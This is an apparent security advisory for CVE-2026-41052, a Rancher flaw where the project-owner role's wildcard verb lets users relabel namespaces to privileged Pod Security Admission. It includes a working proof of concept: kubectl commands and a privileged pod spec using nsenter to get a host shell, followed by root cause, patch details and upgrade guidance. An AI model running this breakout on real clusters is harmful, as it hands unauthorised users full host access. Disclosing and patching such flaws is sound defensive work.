CVE-2026-41052: Rancher Project Owner Privilege Escalation to Host
A Rancher user with Project Owner access can relabel a namespace to use the 'privileged' Pod Security Admission profile, then deploy containers that break out of standard isolation and reach host-leve
The problem
The built-in `project-owner` RoleTemplate granted a wildcard `*` verb on `management.cattle.io/projects`. That wildcard silently included the custom `updatepsa` verb, which Rancher's admission webhook uses to gate Pod Security Admission label changes on namespaces.
A user with only Cluster Member access who also owns a project could therefore call `updatepsa`, flip a namespace to the `privileged` PSA profile, and deploy workloads that disable all container security boundaries. The result is container breakout and full host access on any node that schedules the workload.
Proof of concept
A working proof-of-concept for CVE-2026-41052 in github.com/rancher/rancher, with the exact payload below.
# Step 1 – relabel the namespace to privileged PSA (requires updatepsa, which project-owner had via *)
kubectl label namespace <your-namespace> \
pod-security.kubernetes.io/enforce=privileged \
pod-security.kubernetes.io/enforce-version=latest \
pod-security.kubernetes.io/warn=privileged \
pod-security.kubernetes.io/audit=privileged \
--overwrite
# Step 2 – deploy a privileged pod to escape to the host
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: priv-escape
namespace: <your-namespace>
spec:
hostPID: true
hostNetwork: true
containers:
- name: shell
image: alpine
command: ["nsenter", "--mount=/proc/1/ns/mnt", "--", "/bin/sh"]
securityContext:
privileged: true
stdin: true
tty: true
EOFThe root cause is the wildcard `verbs: ["*"]` in the built-in `project-owner` RoleTemplate for the `projects` resource in the `management.cattle.io` API group. Rancher's webhook checks for the `updatepsa` verb before allowing PSA label mutations on namespaces, but because `*` matches every verb, project owners already had that permission implicitly, bypassing the intended access control gate.
The patch (PR #55061, commit 2800aaac) replaced `"*"` with an explicit allowlist: `get`, `update`, `delete`, `patch`, `create`, `list`, `watch`, `deletecollection`. That list intentionally omits `updatepsa`, so the webhook check now correctly denies the label mutation for project owners.
This maps to CWE-305 (Authentication Bypass by Primary Weakness) and the MITRE ATT&CK techniques T1611 (Escape to Host) and T1068 (Exploitation for Privilege Escalation).
The fix
Upgrade to Rancher v2.12.10, v2.13.6, or v2.14.2. If an immediate upgrade is not possible, replace the built-in `project-owner` role with a custom RoleTemplate that sets verbs for `management.cattle.io/projects` to the explicit list `[get, update, delete, patch, create, list, watch, deletecollection]` and omits `*` and `updatepsa`.
Any existing wildcard-based project-owner bindings must be re-created against the restricted role.
Reported by MMunier and Trolldemorted.
Related research
- high · 8.8CVE-2026-41053CVE-2026-41053: Rancher GitHub App Auth Over-Inclusive Team Membership Expansion
- high · 7.1CVE-2026-50163CVE-2026-50163: oras-go Hardlink Path Traversal via CWD Resolution
- high · 8.1CVE-2026-50138CVE-2026-50138: goshs WebDAV Mode-Flag Access Control Bypass
- high · 7.5CVE-2026-50151CVE-2026-50151: oras-go Credential Leak via Unvalidated Location Header in Blob Upload